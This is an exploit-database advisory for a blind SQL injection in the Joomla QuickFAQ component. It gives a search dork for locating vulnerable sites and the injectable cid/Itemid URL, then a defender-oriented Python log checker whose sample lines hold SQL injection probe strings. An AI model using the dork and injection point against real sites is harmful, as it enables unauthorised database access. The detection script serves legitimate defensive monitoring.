Joomla Component com_quickfaq Blind SQL Injection Vulnerability

2010-07-09T00:00:00
ID 1337DAY-ID-13258
Type zdt
Reporter **RoAd_KiLlEr**
Modified 2010-07-09T00:00:00

Description

Exploit for php platform in category web applications

                                        


I'm **RoAd_KiLlEr** member from Inj3ct0r Team


[+] Title: Joomla Component (com_quickfaq) BSQL-i Vulnerability
[+] Author: **RoAd_KiLlEr**
[+] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+] Tested on: Win XP SP 2/3
---------------------------------------------------------------------------
[~] Found by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://inj3ct0r.com
[~] Vendor: http://www.schlu.net
[~] Download Application: http://www.schlu.net/downloads/16-component/77-quickfaq.html
[~] Version: 1.0.3
==========ExPl0iT3d by **RoAd_KiLlEr**==========
 
[+]Description:
QuickFAQ is an easy to use but powerful FAQ management system.
 
Feature List:
* Unlimited Subcategories
* Assign FAQ Items to multiple Categories
* Create Tags/Labels to flag FAQ Items
* Up/down voting of FAQ Items
* Favour FAQ Items to maintain a personal bookmark list
* Document uploader/manager
* PDF creation of FAQ Items
* RTL support
* RSS/ATOM Feeds
* Detailed statistics
* JComments and JomComments integration
=========================================
 
[+] Dork: inurl:"com_quickfaq"
 
==========================================
 
 
[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
 
[Exploit]:  http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]
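
[Detection example] Added here for defenders, not part of the original advisory or the QuickFAQ code: a log check that flags com_quickfaq requests whose cid or Itemid is not a plain integer, and counts them per client, since blind injection needs many such requests. It assumes common/combined access-log format and that both ids are plain integers; the function names and sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Parameters from the advisory's request; assumed here to be plain integer ids.
NUMERIC_PARAMS = {"cid", "itemid"}
# Client address and request target from a common/combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (.+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Jul/2010:10:00:01 +0000] "GET /index.php?option=com_quickfaq'
    '&view=category&cid=3&Itemid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Jul/2010:10:00:07 +0000] "GET /index.php?option=com_quickfaq'
    '&view=category&cid=3&Itemid=12%20AND%201%3D1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Jul/2010:10:00:08 +0000] "GET /index.php?option=com_quickfaq'
    '&view=category&cid=3&Itemid=12%27 HTTP/1.1" 200 812',
    '203.0.113.7 - - [09/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=7&Itemid=abc HTTP/1.1" 200 900',  # other component: ignored
]

def suspicious_quickfaq_requests(log_lines):
    """Return (client, parameter, decoded value) for each non-integer id sent to com_quickfaq."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the assumed format
        client, target = match.groups()
        params = parse_qsl(urlsplit(target).query)  # percent-decodes names and values
        if ("option", "com_quickfaq") not in params:
            continue
        for name, value in params:
            is_int = value.isascii() and value.isdigit()
            if name.lower() in NUMERIC_PARAMS and not is_int:
                findings.append((client, name, value))
    return findings

def noisy_clients(findings, threshold=2):
    """Clients with at least `threshold` flagged requests (blind injection is request-heavy)."""
    counts = Counter(client for client, _, _ in findings)
    return {client: n for client, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    hits = suspicious_quickfaq_requests(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(noisy_clients(hits))
```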


